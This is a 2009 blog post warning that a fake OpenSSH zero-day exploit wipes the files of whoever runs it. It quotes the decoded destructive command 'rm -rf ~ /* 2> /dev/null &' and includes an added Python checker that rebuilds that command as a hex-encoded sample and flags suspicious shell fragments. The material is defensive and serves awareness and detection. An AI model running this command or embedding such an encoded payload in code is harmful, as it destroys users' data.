2009-07-17

If you see Open0wn.c or 0wn0wn.c laying around, don't run it, mkay?

I continue to see this code masquerading as the Zero-Day OpenSSH Exploit. It showed up on Pastebin today so I reported it as abusive. If you haven't figured it out yet, this "exploit code" only exploits the person that runs it -- i.e. script kiddies and/or careless researchers.

Thierry Zoller already did a great job "disassembling" this and proving that it is being spread just to lay pwnage upon those who are trying to find and/or test the exploit. It basically deletes everything you have in your homedir (and all of the root dir, if you're dumb enough to run it as root) as shown below. I modified the jmpcode[] to something an online hex-to-ascii converter can comprehend, and the result was "rm -rf ~ /* 2> /dev/null &"
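The check described above, as an added example that is not part of the original post: decode the `\x..` byte arrays in a C source before compiling it and flag any "payload" that is really printable shell text. The C source it inspects is constructed for the example (it is not the real 0wn0wn.c); the array names and the list of suspicious fragments are assumptions.

```python
import re
import string

# Constructed sample in the style of a booby-trapped "exploit" source
# (not the real 0wn0wn.c): the first array hides the command the post
# quotes, the second is a few bytes of genuine-looking machine code.
SAMPLE_C_SOURCE = r'''
static char jmpcode[] =
    "\x72\x6d\x20\x2d\x72\x66\x20\x7e\x20\x2f\x2a\x20"
    "\x32\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
static unsigned char shellcode[] = "\x31\xc0\x90\x90\xcc\xeb\xfe";
'''

# Shell fragments that have no business inside a payload meant for a
# remote target; if they are present, the "exploit" runs against you.
SUSPICIOUS = ("rm -rf", "/dev/null", "/bin/sh", "$HOME", "~ ")

ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESC_RE = re.compile(r'\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})|\\(.)|(.)', re.S)
PRINTABLE = set(string.printable.encode())
SIMPLE_ESC = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8}


def decode_c_literal(literals: str) -> bytes:
    """Decode one or more adjacent C string literals into raw bytes."""
    body = "".join(LITERAL_RE.findall(literals))  # strip quotes and gaps
    out = bytearray()
    for hx, octal, esc, ch in ESC_RE.findall(body):
        if hx:
            out.append(int(hx, 16))
        elif octal:
            out.append(int(octal, 8))
        elif esc:
            out.append(SIMPLE_ESC.get(esc, ord(esc)))
        else:
            out.append(ord(ch))
    return bytes(out)


def audit_byte_arrays(source: str) -> dict:
    """Decode every char[] array and flag any that is really shell text."""
    report = {}
    for name, literals in ARRAY_RE.findall(source):
        raw = decode_c_literal(literals)
        printable = sum(b in PRINTABLE for b in raw) / max(len(raw), 1)
        text = raw.decode("latin-1")
        # Real machine code is rarely >90% printable ASCII; a command is.
        report[name] = {"bytes": raw, "text_like": printable > 0.9,
                        "hits": [s for s in SUSPICIOUS if s in text]}
    return report
```

Run `audit_byte_arrays` over the source you downloaded: a `jmpcode`-style array that comes back `text_like` with hits is a command aimed at whoever compiles it, not at the target.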

As a general rule, you should always be careful when tinkering with someone else's untrusted code: never run stuff like this as root without checking the source code, and (yes, I'll say it again) back up your data. It will save your ass.

Check out Thierry's post on secdev for a decode of the rest. It's a good read.
